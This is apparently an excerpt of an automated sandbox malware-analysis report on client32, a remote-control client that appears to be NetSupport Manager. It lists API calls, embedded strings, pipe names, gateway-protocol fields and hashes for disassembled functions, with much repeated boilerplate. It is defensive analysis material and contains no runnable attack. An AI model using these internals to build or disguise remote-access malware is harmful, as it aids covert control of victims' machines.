                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
                                                                                                                        • String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 1116282658-3566152235
                                                                                                                        • Opcode ID: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                        • Instruction ID: 6cb21f8f8127432fbcbf373ae429d8022df700afa094652b34364ba5c840ba31
                                                                                                                        • Opcode Fuzzy Hash: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                        • Instruction Fuzzy Hash: 4D81D575B4030AAFD710DFA5CC85FEEF7B8EB88715F20442DF659A6280E77065408B55
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
                                                                                                                        • ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
                                                                                                                        • _memset.LIBCMT ref: 11043445
                                                                                                                        • _strncpy.LIBCMT ref: 11043473
                                                                                                                        • wsprintfA.USER32 ref: 11043558
                                                                                                                        • _strncpy.LIBCMT ref: 110435A1
                                                                                                                        • _strncpy.LIBCMT ref: 110435D5
                                                                                                                        • SetDlgItemTextA.USER32(?,?,?), ref: 110435F2
                                                                                                                        • SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
                                                                                                                        • SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11043676
                                                                                                                        • SetDlgItemTextA.USER32(?,?,11190240), ref: 1104368E
                                                                                                                        • BringWindowToTop.USER32(?), ref: 110436CA
                                                                                                                        • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110436E3
                                                                                                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110436F8
                                                                                                                          • Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E
                                                                                                                        • MessageBeep.USER32(000000FF), ref: 11043705
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 1104372A
                                                                                                                        • SetFocus.USER32(00000000), ref: 11043731
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemWindow$Text_strncpy$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimer__wcstoi64_memsetwsprintf
                                                                                                                        • String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
                                                                                                                        • API String ID: 1946598539-1930157642
                                                                                                                        • Opcode ID: 36586b8c2c426586482cacd975a0e985f9ba10f583d6a2bbae21fd93714aeaa3
                                                                                                                        • Instruction ID: ded1bb61fb3941f1bcfc90b6e22c684d82d72c36ad168629116a92ba92965352
                                                                                                                        • Opcode Fuzzy Hash: 36586b8c2c426586482cacd975a0e985f9ba10f583d6a2bbae21fd93714aeaa3
                                                                                                                        • Instruction Fuzzy Hash: 83B12774B40316AFE715CB64CCC5FEEB3A5AF44708F2081A8F6559F2C1DAB1B9848B90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1104D870: SetEvent.KERNEL32(?), ref: 1104D927
                                                                                                                          • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D98D
                                                                                                                          • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D99F
                                                                                                                        • wsprintfA.USER32 ref: 1104F394
                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 1104F3BD
                                                                                                                        • GetLastError.KERNEL32 ref: 1104F3C8
                                                                                                                        • SetNamedPipeHandleState.KERNEL32(00000000,00000002,00000000,00000000), ref: 1104F3F5
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,7E4636A2), ref: 1104F40B
                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_0003C050,00000001,00000000), ref: 1104F4B5
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 1104F4C3
                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1104F4D7
                                                                                                                        • GetPriorityClass.KERNEL32(00000000), ref: 1104F4EC
                                                                                                                          • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
                                                                                                                          • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
                                                                                                                          • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
                                                                                                                        • GetDC.USER32(00000000), ref: 1104F4FA
                                                                                                                        • GetACP.KERNEL32(View,CacheSize,00000400,00000000), ref: 1104F54E
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 1104F55D
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1104F56C
                                                                                                                        • GetDeviceCaps.GDI32(?,00000026), ref: 1104F58A
                                                                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 1104F59A
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 1104F5C8
                                                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 1104F5D6
                                                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 1104F5E0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Handle$CapsDevice$CloseProcess$CreateEventMetricsSystem$AddressClassCurrentErrorFileLastModuleNamedOpenPipePriorityProcReleaseStateThreadWindowwsprintf
                                                                                                                        • String ID: CLTCONN.CPP$CacheSize$Error creating hShowPipe, e=%d$Show enabling mirror$View$\\.\pipe\nsm_ctl32_show_%d$idata->hShowEvent
                                                                                                                        • API String ID: 1070019554-2085025582
                                                                                                                        • Opcode ID: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
                                                                                                                        • Instruction ID: a762959b66c2b007555d3d1dad52a1717f1328b6c18758764795a7a29e9eccb5
                                                                                                                        • Opcode Fuzzy Hash: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
                                                                                                                        • Instruction Fuzzy Hash: DBD13F74E007169FDB15CF68C888BEEB7F5BB48304F1085ADE96A97284DB74AA40CF51
                                                                                                                        APIs
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109D152
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109D175
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1109D180
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109D195
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109D19B
                                                                                                                        • SetEvent.KERNEL32(?), ref: 1109D1A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
                                                                                                                        • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                                                        • API String ID: 1194186020-3727536503
                                                                                                                        • Opcode ID: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
                                                                                                                        • Instruction ID: 6b473be9785bc0d4b7e502112369cfe56b08eb277d01e6e1a90085580c10e120
                                                                                                                        • Opcode Fuzzy Hash: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
                                                                                                                        • Instruction Fuzzy Hash: 49B16FB5A007089BD720CF25D894B5AF7F5BF88314F10CA9DEA4A9B640CB70E981DF60
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_memsetwsprintf
                                                                                                                        • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                        • API String ID: 3453958691-770455996
                                                                                                                        • Opcode ID: a4b3b1cb6e38c4758c195a3c9de24e958abacf994ffaf34fd91b8a055f761e2f
                                                                                                                        • Instruction ID: 0e393dd9f50b4abf726b269e2623b848e1bd90be6afddd879db765a1a84127a1
                                                                                                                        • Opcode Fuzzy Hash: a4b3b1cb6e38c4758c195a3c9de24e958abacf994ffaf34fd91b8a055f761e2f
                                                                                                                        • Instruction Fuzzy Hash: 7A813AB5600605AFE364DBA5C990EABF7F9AF8C304F10450DF6AA97241DA71FC41CB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685A75B0: _malloc.LIBCMT ref: 685A75D8
                                                                                                                          • Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26
                                                                                                                          • Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
                                                                                                                          • Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090
                                                                                                                        • _free.LIBCMT ref: 6859BF22
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • _free.LIBCMT ref: 6859BF51
                                                                                                                        • _free.LIBCMT ref: 6859BF7C
                                                                                                                        • _free.LIBCMT ref: 6859C005
                                                                                                                        • _free.LIBCMT ref: 6859C034
                                                                                                                        • _free.LIBCMT ref: 6859C063
                                                                                                                        • _free.LIBCMT ref: 6859C109
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$_malloc$ErrorFreeHeapLast__vswprintf
                                                                                                                        • String ID: APPTYPE=%d$BFLG=%d$DA=%d$DATA=$DEPT=%s$ED=%s$ID=%d$MO=%d$OC=%d$SD=%s$TIMING=%d$TM=%s$TZ=%d$UID=%s$UN=%s$WD=%u$WP=%d$YR=%d
                                                                                                                        • API String ID: 2888336863-1668223812
                                                                                                                        • Opcode ID: 5f6e654067dc42f024d4c171069c0b345f5afc91ea3844a57abd888861314588
                                                                                                                        • Instruction ID: 4ac3fbd877a0014275f0bfd1f2da07bf3f2596ecff889c667ec52b0ef473c7ae
                                                                                                                        • Opcode Fuzzy Hash: 5f6e654067dc42f024d4c171069c0b345f5afc91ea3844a57abd888861314588
                                                                                                                        • Instruction Fuzzy Hash: 69514EB9680604BBEB119B65CCC0E7F77BCAB94609FC08548FC5A96201EB34ED1586A9
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$_memset$lstrlen
                                                                                                                        • String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
                                                                                                                        • API String ID: 1776203170-3520600413
                                                                                                                        • Opcode ID: 3f222f001db363623bbc6e5e8fc402dfb860905e50367f45fce6ab83d0f3b326
                                                                                                                        • Instruction ID: 5859deee622398186814a40ef6b55c4e5f9d9b91984dd677fafb4e7dc04c026d
                                                                                                                        • Opcode Fuzzy Hash: 3f222f001db363623bbc6e5e8fc402dfb860905e50367f45fce6ab83d0f3b326
                                                                                                                        • Instruction Fuzzy Hash: 36A182B5940218AFDB20DBA4CC98FEFB77CAF85305F8045D9E549A7141EB30AE848F65
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(00000304), ref: 6859EEC7
                                                                                                                        • WaitForSingleObject.KERNEL32(000002FC,00001388), ref: 6859EED5
                                                                                                                        • TerminateThread.KERNEL32(000002FC,000000FF), ref: 6859EEF5
                                                                                                                        • CloseHandle.KERNEL32(000002FC), ref: 6859EF07
                                                                                                                        • SetEvent.KERNEL32(00000294), ref: 6859EF16
                                                                                                                        • ctl_hangup.HTCTL32(00000001), ref: 6859EF26
                                                                                                                        • Sleep.KERNEL32(00000014), ref: 6859EFB8
                                                                                                                        • CloseHandle.KERNEL32(00000304), ref: 6859EFCE
                                                                                                                        • CloseHandle.KERNEL32(00000308), ref: 6859EFD6
                                                                                                                        • CloseHandle.KERNEL32(00000294), ref: 6859EFDF
                                                                                                                        • WSACleanup.WSOCK32 ref: 6859EFE9
                                                                                                                        • CloseHandle.KERNEL32(00000300), ref: 6859EFFB
                                                                                                                        • DeleteCriticalSection.KERNEL32(00000002), ref: 6859F01F
                                                                                                                        • DeleteCriticalSection.KERNEL32(685DB898), ref: 6859F03A
                                                                                                                        • _free.LIBCMT ref: 6859F043
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • _free.LIBCMT ref: 6859F04F
                                                                                                                        • _free.LIBCMT ref: 6859F07B
                                                                                                                        • _free.LIBCMT ref: 6859F08D
                                                                                                                        • _memset.LIBCMT ref: 6859F0A1
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6859F0BB
                                                                                                                        • timeEndPeriod.WINMM(00000001), ref: 6859F0D6
                                                                                                                          • Part of subcall function 68594610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 68594698
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
                                                                                                                        • String ID: CMD=CLOSE$Error. Terminating httprecv Thread
                                                                                                                        • API String ID: 2861375113-448471891
                                                                                                                        • Opcode ID: fc051a299ba01e1f24bd407cf94d445226a83a3aa14372878ccfdffad02cc4c7
                                                                                                                        • Instruction ID: c30885a7dfc5ab60f188418b8a5d9162d0126681c6b198fba1298513d969a2a9
                                                                                                                        • Opcode Fuzzy Hash: fc051a299ba01e1f24bd407cf94d445226a83a3aa14372878ccfdffad02cc4c7
                                                                                                                        • Instruction Fuzzy Hash: 745182B5900245AFDF00EFB8CC809AF73B9BB86304B964569ED15D3240DB71ED408BAA
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 68592A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
                                                                                                                          • Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592ADA
                                                                                                                          • Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592AEA
                                                                                                                          • Part of subcall function 68592A90: wsprintfA.USER32 ref: 68592B05
                                                                                                                        • GetModuleHandleA.KERNEL32(NSMTRACE,68592AB1), ref: 68592CFA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 68592D15
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 68592D22
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 68592D2F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 68592D3C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 68592D49
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 68592D56
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 68592D63
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 68592D70
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 68592D7D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 68592D8A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
